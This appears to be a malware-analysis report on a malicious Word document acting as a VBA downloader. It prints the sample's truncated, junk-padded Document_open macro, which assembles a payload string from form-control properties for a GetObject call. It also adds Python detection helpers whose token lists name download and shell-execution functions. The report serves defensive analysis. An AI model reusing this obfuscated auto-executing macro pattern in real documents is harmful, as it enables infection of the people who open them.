Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample contains VBA macros, including a Document_Open handler (VBA is case-insensitive, so the Document_open spelling in the extracted source is the same procedure). Document_Open runs as soon as the document is opened and macros are enabled, which makes it the standard auto-execution hook for malicious Office documents. ClamAV also matches the file with its generic downloader signature Doc.Downloader.Generic-7469240-0. The VBA source is heavily padded with junk declarations, assignments to variables that are never read, and lorem-ipsum string literals; the statements that do matter build a string by concatenating properties of form controls (a TextBox control declared on the document module Jihqsout, and control properties including .Tag on the Bfaidczate form) rather than holding the payload string inline, so the command or URL is not recoverable from the macro source alone and has to be read from the form streams. Taken together with the GetObject call and the ClamAV downloader signature, this points to a downloader that fetches and executes a second-stage payload. No specific malware family could be identified.
Heuristics (6)
- ClamAV: Doc.Downloader.Generic-7469240-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Generic-7469240-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro (runs automatically when the document is opened with macros enabled)
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call (object-execution token; commonly used to obtain a COM object such as a shell or WMI moniker without naming CreateObject)
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace identifier, not a download location, so its presence in the document body is expected noise rather than an indicator; the second-stage URL is not visible in the extracted macro source.
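The last two heuristics are straightforward to reproduce. The following Python is an added example, not the analyzer's own code: `scan_stream` implements the co-occurrence rule behind OLE_VBA_PCODE_AUTOEXEC_EXEC over the raw bytes of a VBA stream (it searches for each token as ASCII and as UTF-16LE, which is this example's assumption about how identifier names may be stored in compiled and cache streams), and `classify_url` applies the per-URL channel logic behind EMBEDDED_URL, downgrading well-known XML namespace hosts unless the URL was reached from macro code. The token lists, the namespace host allowlist and the sample byte string are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Token classes for the co-occurrence rule (constructed lists; extend as needed).
AUTOEXEC_TOKENS = ["Document_Open", "Document_Close", "AutoOpen", "Auto_Open",
                   "AutoClose", "AutoExec", "Workbook_Open", "Workbook_Activate"]
EXEC_TOKENS = ["URLDownloadToFile", "WScript.Shell", "ShellExecute", "CreateObject",
               "GetObject", "WinHttpRequest", "XMLHTTP", "Powershell", "Shell"]


def _token_regex(tokens):
    """Case-insensitive bytes regex matching each token as ASCII or as UTF-16LE.
    Longer tokens go first so 'ShellExecute' is not reported as a bare 'Shell'."""
    parts = []
    for tok in sorted(tokens, key=len, reverse=True):
        parts.append(re.escape(tok.encode("ascii")))
        parts.append(re.escape(tok.encode("utf-16-le")))
    return re.compile(b"(?i)(?:" + b"|".join(parts) + b")")


AUTOEXEC_RE = _token_regex(AUTOEXEC_TOKENS)
EXEC_RE = _token_regex(EXEC_TOKENS)


def _canonical(match_bytes, tokens):
    """Map a raw match (either encoding) back to the canonical token spelling."""
    if b"\x00" in match_bytes:
        text = match_bytes.decode("utf-16-le")
    else:
        text = match_bytes.decode("latin-1")
    for tok in tokens:
        if tok.lower() == text.lower():
            return tok
    return text


def scan_stream(data):
    """Apply the OLE_VBA_PCODE_AUTOEXEC_EXEC rule to one stream's raw bytes.
    Flags only when an auto-execution name AND an execution token both occur;
    either class alone is reported but does not raise the flag."""
    autoexec = sorted({_canonical(m.group(0), AUTOEXEC_TOKENS)
                       for m in AUTOEXEC_RE.finditer(data)})
    execs = sorted({_canonical(m.group(0), EXEC_TOKENS)
                    for m in EXEC_RE.finditer(data)})
    return {"autoexec": autoexec, "exec": execs, "flag": bool(autoexec and execs)}


# Hosts that carry XML namespace identifiers in ordinary Office files (constructed allowlist).
NAMESPACE_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com",
                   "www.w3.org", "purl.org"}


def classify_url(url, channel):
    """Severity label for one extracted URL given the channel that reached it
    ('macro', 'js', 'link', 'body'). A URL reached from macro code is never downgraded."""
    host = (urlparse(url).hostname or "").lower()
    if channel == "macro":
        return "suspicious"
    if host in NAMESPACE_HOSTS:
        return "known-namespace"
    return "info"


# Constructed stand-in for a compiled VBA/cache stream: binary noise around an
# auto-exec handler name stored as UTF-16LE and an execution token stored as ASCII.
SAMPLE_STREAM = (
    b"\x01\x16\x03\x00\x00\xf0\x00\x00\x00\x00"
    + b'Attribute VB_Name = "Jihqsout"\x00\x00'
    + "Document_open".encode("utf-16-le")
    + b"\x00\x00MSForms\x00TextBox\x00"
    + b"\x00GetObject\x00\x00Hic fuga.\x00"
)

if __name__ == "__main__":
    print(scan_stream(SAMPLE_STREAM))
    print(classify_url("http://schemas.openxmlformats.org/drawingml/2006/main", "body"))
```

Run it over every stream under the `Macros`/`VBA` storage (and the `__SRP_*` cache streams) of an OLE file, not just the module streams; a document whose source has been stripped or corrupted still carries the identifier names in the compiled streams, which is exactly the case the heuristic exists for.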
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12987 bytes |
SHA-256 (macros.bas): e643dbfd194abbb2667383b9693344899314986a9fee7d4a913179b589470142
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Jihqsout"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Vrsmnspntvm, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Prcjbmcyjg As Integer
Dim Qbdckyorb As Double
Zcwbkjgpwsqz = Gujfpsgqqe
Bdemyleydh = (Socqpnabtr)
Flltnilsi = 298
Dim Dkjtfvmhy As String
Nbqpbddrrjzag = "Hic fuga."
Dim Kkuvlcsg As Double
Dim Ftvggjfoh As Integer
Dim Dxhipriydk As Boolean
Elbncdvuu = (708)
Dim Vjilkaulzo As Integer
Dim Mmnwljivv As Integer
Qvfwclmdpm = Zggyyjzdto
Dim Apgjllvntxs As Double
Dim Drznkauya As Boolean
Dim Fljmwysbqrw As Double
Csdqbrboq = (Rzqiojqzbqdz)
Rverzngevk = ("Tempore culpa veniam.")
Dwimcprpuwikm = (Xloyschj)
Dim Wqgnnefqsgtqo As String
Imounuesljt = Zuvnmqfylb
Hjuobusbjmyhv
Dim Hbjvpgosgb As Double
Dim Bbaypgcbold As Boolean
Savqfqbdg = Ovegoufy
Fobyalyruwxv = (Gtbbkvkvhykuc)
Tffjjnlusff = 201
Dim Lxesdhavse As Boolean
Kjgcnfidd = "Reprehenderit natus."
Dim Rmijvyiwfsx As Boolean
Dim Trqvvrabsb As Double
Dim Erfzwailg As Double
Vyfwkhiqn = (243)
Dim Ivonhlzpzkjeq As Boolean
Dim Wjrpyehl As Integer
Qvqtklleiijki = Lqmvmtoqgkzyy
Dim Bktrrqjvpzya As Boolean
Dim Tmazsnnupicbe As String
Dim Kmndqhzrrb As Boolean
Uxvotgtm = (Zfoegukopmzme)
Xspuvjxmls = ("Zachary")
Ujvlxkmnhola = (Dmtdisidw)
Dim Sdpbtdlj As String
Etabcszdigp = Glshkflrnhi
End Sub
Attribute VB_Name = "Bfaidczate"
Attribute VB_Base = "0{37381860-4018-46F9-9746-3785BB847609}{52D9F837-9AF7-4C15-BE90-B3E84C122B38}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Fikoomhtxmywe"
Function Trxaqzicdg()
Dim Weldychlufw As Boolean
Dim Ocnazgxk As Double
Jdtwqefvswln = Sbebwdznsmi
Bpwnejmbaef = (Pjemoaixi)
Vnjrvkgo = 420
Dim Dgwihehorwz As Integer
Oqjgyhbqtrv = "Aut."
Dim Zugpyrkplch As Double
Dim Waiqbblxu As Integer
Dim Ehheakobqq As Double
Ibyizacocbr = (595)
Dim Icqtgtet As Boolean
Dim Qjgobngoqr As Integer
Octlwrnj = Wdshyhjwzun
Dim Ytlbavnat As Integer
Dim Onzvxnflj As Integer
Dim Cwupyeursmy As Double
Rkqmnopcpksk = (Ymocghkqphk)
Gbvvqsednw = ("Illum velit dolor dolore minima dicta optio et.")
Ullnlbeqqwfej = (Kaujbqeibu)
Dim Rdllpvfl As Boolean
Ddfggtkwqlygt = Nrhqckswymmf
Qmchatdghs = Jihqsout.Vrsmnspntvm
Dim Nlrqrhtcakum As Double
Dim Ltigehtwkfb As String
Tvgremqx = Ygresvaapk
Prlmdbqbl = (Gagusqacszika)
Abjfmjyl = 942
Dim Gsipgkyjikd As String
Hkphiihg = "Necessitatibus porro sit."
Dim Aaprgcoipafmy As Integer
Dim Mpkbrbzoabu As Double
Dim Pcyivsio As Boolean
Rgtcnlwvmxuw = (184)
Dim Ftyampplensmc As Boolean
Dim Fizuwsuyzld As Double
Izhtjbdbu = Cdgbgkbj
Dim Gpvbxfkuy As Double
Dim Kjcffzcat As Double
Dim Axssmtspku As Integer
Cjmrmwsg = (Trudwakyigpu)
Jesrcjfoghavt = ("Architecto vel est.")
Eaipidayiwr = (Lymhvoiidb)
Dim Nflmcahdie As String
Eguigkulf = Hvsaeyha
Ewtegobkr = Qmchatdghs + Bfaidczate.Dowglmwp + Bfaidczate.Jhvyreanshhmg + Bfaidczate.Wbgmgpinetsvc
Dim Goauorhv As String
Dim Pbkzgyibskp As Double
Mnjmpxsh = Ypxuairngiuoa
Bkghypnplohee = (Diudmkjdhtbwi)
Xmrnnmlzvi = 610
Dim Lgsdmvhe As Double
Xgosgznxsefc = "Reprehenderit modi."
Dim Nqelrjyubjxx As Double
Dim Pbbewepkzvg As String
Dim Yqfujpxpvr As Integer
Cuceeujkxi = (417)
Dim Bfmfcrif As String
Dim Aevpniqatkfru As Integer
Guawcoqzct = Sneiqheu
Dim Phbtwogxjl As Boolean
Dim Wwiidjjetvjf As String
Dim Obpkponxftv As Double
Csejszzrizhe = (Tptxvujzfh)
Oezrpnurhmomq = ("Ipsam dolorum.")
Wgbigtduhlwzo = (Nxjxkurq)
Dim Jddhbhgpwnsd As Double
Ckkrfsnfjezr = Vdeprowpznge
Ksgzqgqfnb = Ewtegobkr + Bfaidczate.Dscvywigmjcx + Bfaidczate.Htgcvqxu.Tag
Dim Fqjrpbzl As Integer
Dim Osgsqfgo As Boolean
Daqwoehpsa = Kiorgvzip
Bpykzxts = (Da
... (truncated)
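The preview shows the pattern described in the analysis note: almost every statement is padding, and the string that eventually reaches the object-execution call is assembled from form-control properties. A backward slice from the execution sinks strips the padding mechanically and lists the control properties an analyst still has to pull from the form streams (olevba's form-string extraction is the usual next step). The following Python is an added triage helper, not part of this report or of oletools. Its input is a constructed excerpt modelled on the preview; the final `Set Obj = GetObject(Ksgzqgqfnb)` line is an assumption standing in for the GetObject call the heuristics flag, since the preview is truncated before it.

```python
import re

# Constructed excerpt modelled on the macro preview above. The last statement
# (Set Obj = GetObject(...)) is an ASSUMPTION standing in for the GetObject call
# the heuristics flag; the report's preview is truncated before that point.
SAMPLE_VBA = """Private Sub Document_open()
Dim Prcjbmcyjg As Integer
Zcwbkjgpwsqz = Gujfpsgqqe
Nbqpbddrrjzag = "Hic fuga."
Qmchatdghs = Jihqsout.Vrsmnspntvm
Ewtegobkr = Qmchatdghs + Bfaidczate.Dowglmwp + Bfaidczate.Jhvyreanshhmg
Dim Goauorhv As String
Xgosgznxsefc = "Reprehenderit modi."
Ksgzqgqfnb = Ewtegobkr + Bfaidczate.Dscvywigmjcx + Bfaidczate.Htgcvqxu.Tag
Daqwoehpsa = Kiorgvzip
Set Obj = GetObject(Ksgzqgqfnb)
End Sub
"""

# Execution sinks to slice from (constructed list; extend with what your triage cares about).
SINK_RE = re.compile(r"\b(GetObject|CreateObject|Shell|ShellExecute|URLDownloadToFile)\b", re.I)
# "Target = expr" or "Set Target = expr"; group 1 is the target, group 2 the right-hand side.
ASSIGN_RE = re.compile(r"^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.*)$", re.I)
IDENT_RE = re.compile(r"\b[A-Za-z_]\w*\b")
BOUNDARY_RE = re.compile(
    r"^\s*(?:(?:Private|Public)\s+)?(?:Sub|Function)\b|^\s*End\s+(?:Sub|Function)\b", re.I)
# Module.Control or Module.Control.Property: values stored outside the macro source.
CONTROL_REF_RE = re.compile(
    r"\b([A-Za-z_]\w*)\.([A-Za-z_]\w*)(?:\.(Tag|Text|Caption|ControlTipText|Value))?\b")


def backward_slice(src):
    """Keep only the statements that feed an execution sink, plus procedure
    boundaries. Assignments whose targets are never consumed on the way to a
    sink (the junk padding) fall away. Bare procedure calls are not followed."""
    lines = src.splitlines()
    defs = {}  # lowercase target name -> indexes of lines assigning it
    for i, line in enumerate(lines):
        m = ASSIGN_RE.match(line)
        if m:
            defs.setdefault(m.group(1).lower(), []).append(i)
    keep = {i for i, line in enumerate(lines)
            if SINK_RE.search(line) and not line.strip().lower().startswith("dim ")}
    work = list(keep)
    while work:
        i = work.pop()
        m = ASSIGN_RE.match(lines[i])
        rhs = m.group(2) if m else lines[i]
        for name in IDENT_RE.findall(rhs):
            for j in defs.get(name.lower(), []):
                if j not in keep:
                    keep.add(j)
                    work.append(j)
    keep.update(i for i, line in enumerate(lines) if BOUNDARY_RE.match(line))
    return [lines[i] for i in sorted(keep)]


def form_control_refs(sliced_lines):
    """Module.Control[.Property] references inside the slice: the pieces of the
    payload string that live in form/document streams, not in the VBA source."""
    refs = set()
    for line in sliced_lines:
        for module, control, prop in CONTROL_REF_RE.findall(line):
            refs.add(".".join(p for p in (module, control, prop) if p))
    return sorted(refs)


if __name__ == "__main__":
    sliced = backward_slice(SAMPLE_VBA)
    print("\n".join(sliced))
    print("control properties to dump:", form_control_refs(sliced))
```

The slice leaves six lines of the twelve: the handler boundaries, the three concatenations and the sink. Two caveats the preview itself illustrates: a bare procedure call such as `Hjuobusbjmyhv` has side effects the slicer cannot see, so add such names to the sink list or inline the procedure before slicing; and a control reference without an explicit property (`Bfaidczate.Dowglmwp`) reads the control's default property, which for a TextBox is its text, so the default value in the form stream is what has to be dumped.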